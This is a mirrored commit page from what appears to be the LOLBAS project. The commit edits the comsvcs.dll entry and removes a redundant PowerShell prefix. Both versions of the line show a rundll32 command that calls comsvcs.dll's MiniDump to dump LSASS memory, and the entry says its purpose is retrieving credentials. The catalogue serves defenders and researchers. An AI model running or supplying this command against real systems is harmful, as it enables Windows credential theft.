mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-28 15:58:24 +01:00
Remove redundant powershell command from comsvcs entry
This commit is contained in:
parent
b92ee99627
commit
2b20998371
@ -4,7 +4,7 @@ Description: COM+ Services
|
|||||||
Author:
|
Author:
|
||||||
Created: 2019-08-30
|
Created: 2019-08-30
|
||||||
Commands:
|
Commands:
|
||||||
- Command: powershell /c rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
|
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
|
||||||
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
|
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
|
||||||
Usecase: Dump Lsass.exe process memory to retrieve credentials.
|
Usecase: Dump Lsass.exe process memory to retrieve credentials.
|
||||||
Category: Dump
|
Category: Dump
|
||||||
|
Loading…
Reference in New Issue
Block a user